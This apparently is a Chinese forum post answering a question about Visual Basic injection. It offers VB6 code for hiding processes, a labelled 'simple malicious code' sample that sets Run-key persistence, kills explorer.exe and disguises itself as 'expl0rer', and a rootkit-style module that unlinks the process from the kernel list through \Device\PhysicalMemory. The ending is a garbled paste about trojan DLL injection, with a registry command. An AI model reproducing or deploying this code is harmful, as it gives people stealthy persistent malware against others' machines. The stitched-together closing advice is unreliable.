VB 注入 程序

注入我也不会，水平有限

不过隐藏进程倒是有些简易办法：

把你要隐藏进程的程序改成svchost.exe

或：

第1种-关闭后到像迅雷一样隐藏

Private Sub Form_Queryunload(Cancel As Integer, unloadmode As Integer)

Cancel = True

Me.Hide

End Sub

_____________________________

第2种-直接隐藏

Form1.Visible = False

_____________________________

第3种-在任务管理器应用程序中隐藏

App.TaskVisible = False

_____________________________

于是就可以编写一个简单的恶意代码

Private Sub Form_Load

Set w = CreateObject("wscript.shell")

w.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" &App.EXEName, App.Path &"\" &App.EXEName &".exe" '导入注册表,实现开机自动运行

Form1.Visible = False

App.Taskvisible = False

Shell "taskkill /f /im explorer.exe ", VBHide '结束explorer.exe进程

Open "c:\windows\$$$.bat" for Append As #1

Print #1 , "@echo off"

Print #1 , "echo 恭喜你中毒"

Print #1 , "echo. &pause"

close #1

x = shell("c:\windows\$$$.bat")

....... '这里不讨论这个问题,自由发挥,最后把文件名改为expl0rer等

End Sub

----------------------------------------------------------------------

再或者：

添加一个按钮和模块，按按钮后进程隐藏

窗体：

Private Sub Command1_Click()

HideCurrentProcess

End Sub

模块：

'模块名称：modHideProcess.bas

'模块功能：在 XP/2K 任务管理器的进程列表中隐藏当前进程

'使用方法：直接调用 HideCurrentProcess()

'模块作者：检索自互联网，原作者不详。

Option Explicit

Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004

Private Const STATUS_ACCESS_DENIED = &HC0000022

Private Const STATUS_INVALID_HandLE = &HC0000008

Private Const ERROR_SUCCESS = 0&

Private Const SECTION_MAP_WRITE = &H2

Private Const SECTION_MAP_READ = &H4

Private Const READ_CONTROL = &H20000

Private Const WRITE_DAC = &H40000

Private Const NO_INHERITANCE = 0

Private Const DACL_SECURITY_INFORMATION = &H4

Private Type IO_STATUS_BLOCK

Status As Long

Information As Long

End Type

Private Type UNICODE_STRING

Length As Integer

MaximumLength As Integer

Buffer As Long

End Type

Private Const OBJ_INHERIT = &H2

Private Const OBJ_PERMANENT = &H10

Private Const OBJ_EXCLUSIVE = &H20

Private Const OBJ_CASE_INSENSITIVE = &H40

Private Const OBJ_OPENIF = &H80

Private Const OBJ_OPENLINK = &H100

Private Const OBJ_KERNEL_HandLE = &H200

Private Const OBJ_VALID_ATTRIBUTES = &H3F2

Private Type OBJECT_ATTRIBUTES

Length As Long

RootDirectory As Long

ObjectName As Long

Attributes As Long

SecurityDeor As Long

SecurityQualityOfService As Long

End Type

Private Type ACL

AclRevision As Byte

Sbz1 As Byte

AclSize As Integer

AceCount As Integer

Sbz2 As Integer

End Type

Private Enum ACCESS_MODE

NOT_USED_ACCESS

GRANT_ACCESS

SET_ACCESS

DENY_ACCESS

REVOKE_ACCESS

SET_AUDIT_SUCCESS

SET_AUDIT_FAILURE

End Enum

Private Enum MULTIPLE_TRUSTEE_OPERATION

NO_MULTIPLE_TRUSTEE

TRUSTEE_IS_IMPERSONATE

End Enum

Private Enum TRUSTEE_FORM

TRUSTEE_IS_SID

TRUSTEE_IS_NAME

End Enum

Private Enum TRUSTEE_TYPE

TRUSTEE_IS_UNKNOWN

TRUSTEE_IS_USER

TRUSTEE_IS_GROUP

End Enum

Private Type TRUSTEE

pMultipleTrustee As Long

MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION

TrusteeForm As TRUSTEE_FORM

TrusteeType As TRUSTEE_TYPE

ptstrName As String

End Type

Private Type EXPLICIT_ACCESS

grfAccessPermissions As Long

grfAccessMode As ACCESS_MODE

grfInheritance As Long

TRUSTEE As TRUSTEE

End Type

Private Type AceArray

List() As EXPLICIT_ACCESS

End Type

Private Enum SE_OBJECT_TYPE

SE_UNKNOWN_OBJECT_TYPE = 0

SE_FILE_OBJECT

SE_SERVICE

SE_PRINTER

SE_REGISTRY_KEY

SE_LMSHARE

SE_KERNEL_OBJECT

SE_WINDOW_OBJECT

SE_DS_OBJECT

SE_DS_OBJECT_ALL

SE_PROVIDER_DEFINED_OBJECT

SE_WMIGUID_OBJECT

End Enum

Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long

Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long

Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long

Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)

Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)

Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long

Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long

Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long

Private Type OSVERSIONINFO

dwOSVersionInfoSize As Long

dwMajorVersion As Long

dwMinorVersion As Long

dwBuildNumber As Long

dwPlatformId As Long

szCSDVersion As String * 128

End Type

Private verinfo As OSVERSIONINFO

Private g_hNtDLL As Long

Private g_pMapPhysicalMemory As Long

Private g_hMPM As Long

Private aByte(3) As Byte

Public Sub HideCurrentProcess()

'在进程列表中隐藏当前应用程序进程

Dim thread As Long, process As Long, fw As Long, bw As Long

Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

verinfo.dwOSVersionInfoSize = Len(verinfo)

If (GetVersionEx(verinfo)) <>0 Then

If verinfo.dwPlatformId = 2 Then

If verinfo.dwMajorVersion = 5 Then

Select Case verinfo.dwMinorVersion

Case 0

lOffsetFlink = &HA0

lOffsetBlink = &HA4

lOffsetPID = &H9C

Case 1

lOffsetFlink = &H88

lOffsetBlink = &H8C

lOffsetPID = &H84

End Select

End If

End If

End If

If OpenPhysicalMemory <>0 Then

thread = GetData(&HFFDFF124)

process = GetData(thread + &H44)

fw = GetData(process + lOffsetFlink)

bw = GetData(process + lOffsetBlink)

SetData fw + 4, bw

SetData bw, fw

CloseHandle g_hMPM

End If

End Sub

Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)

Dim pDacl As Long

Dim pNewDacl As Long

Dim pSD As Long

Dim dwRes As Long

Dim ea As EXPLICIT_ACCESS

GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD

ea.grfAccessPermissions = SECTION_MAP_WRITE

ea.grfAccessMode = GRANT_ACCESS

ea.grfInheritance = NO_INHERITANCE

ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME

ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER

ea.TRUSTEE.ptstrName = "CURRENT_USER" &vbNullChar

SetEntriesInAcl 1, ea, pDacl, pNewDacl

SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0

CleanUp:

LocalFree pSD

LocalFree pNewDacl

End Sub

Private Function OpenPhysicalMemory() As Long

Dim Status As Long

Dim PhysmemString As UNICODE_STRING

Dim Attributes As OBJECT_ATTRIBUTES

RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")

Attributes.Length = Len(Attributes)

Attributes.RootDirectory = 0

Attributes.ObjectName = VarPtr(PhysmemString)

Attributes.Attributes = 0

Attributes.SecurityDeor = 0

Attributes.SecurityQualityOfService = 0

Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)

If Status = STATUS_ACCESS_DENIED Then

Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)

SetPhyscialMemorySectionCanBeWrited g_hMPM

CloseHandle g_hMPM

Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)

End If

Dim lDirectoty As Long

verinfo.dwOSVersionInfoSize = Len(verinfo)

If (GetVersionEx(verinfo)) <>0 Then

If verinfo.dwPlatformId = 2 Then

If verinfo.dwMajorVersion = 5 Then

Select Case verinfo.dwMinorVersion

Case 0

lDirectoty = &H30000

Case 1

lDirectoty = &H39000

End Select

End If

End If

End If

If Status = 0 Then

g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)

If g_pMapPhysicalMemory <>0 Then OpenPhysicalMemory = g_hMPM

End If

End Function

Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long

Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long

Dim lTemp As Long

VAddr = addr

CopyMemory aByte(0), VAddr, 4

lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))

PGDE = BaseAddress + lTemp * 4

CopyMemory PGDE, ByVal PGDE, 4

If (PGDE And 1) <>0 Then

lTemp = PGDE And &H80

If lTemp <>0 Then

PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)

Else

PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)

lTemp = (VAddr And &H3FF000) / (2 ^ 12)

PTE = PGDE + lTemp * 4

CopyMemory PTE, ByVal PTE, 4

If (PTE And 1) <>0 Then

PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)

UnmapViewOfFile PGDE

End If

End If

End If

LinearToPhys = PAddr

End Function

Private Function GetData(addr As Long) As Long

Dim phys As Long, tmp As Long, ret As Long

phys = LinearToPhys(g_pMapPhysicalMemory, addr)

tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)

If tmp <>0 Then

ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4

CopyMemory ret, ByVal ret, 4

UnmapViewOfFile tmp

GetData = ret

End If

End Function

Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean

Dim phys As Long, tmp As Long, x As Long

phys = LinearToPhys(g_pMapPhysicalMemory, addr)

tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)

If tmp <>0 Then

x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4

CopyMemory ByVal x, data, 4

UnmapViewOfFile tmp

SetData = True

End If

End Function

Private Function ByteArrToLong(inByte() As Byte) As Double

Dim i As Integer

For i = 0 To 3

ByteArrToLong = ByteArrToLong + inByte(i) * (&H100 ^ i)

Next i

End Function

----------------------------------------------------------------------

再或者：

Private Sub Command1_Click()

Const HIDDEN_WINDOW = 12

strComputer = "."

Set objWMIService = GetObject("winmgmts:" _

&"{impersonationLevel=impersonate}!\\" &strComputer &"\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_

objConfig.ShowWindow = HIDDEN_WINDOW

Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")

errReturn = objProcess.Create("程序路径", Null, objConfig, intProcessID)

End Sub

首先来了解远程线程注入远程线程插入（注入）技术指的是通过在另一个进程中创建远程线程的方法进入目标进程的内存地址空间。将木马程序以DLL的形式实现后，需要使用插入到目标进程中的远程线程将该木马DLL插入到目标进程的地址空间，即利用该线程通过调用Windows API LoadLibrary函数来加载木马DLL，从而实现木马对系统的侵害。 这种技术一般用于外挂 当外挂注入到游戏中时 你的电脑也就中啦木马 一般的解决方法　wmiprvse.exe是一个系统服务的进程，你可以结束任务，进程自然消失。 禁用Windows Management Instrumentation Driver Extensions服务或者改为手动 具体：桌面-我的电脑-管理-服务和应用程序-服务 里面有个Windows Management Instrumentation 右键—禁用就可以了. 我也用过，感觉第二种方法较好。 解除命令方法：同样 *** 作复制下边的命[1][2][3]令粘贴输入，回车确定。即可、 reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmiprvse.exe” /f希望会帮到你

---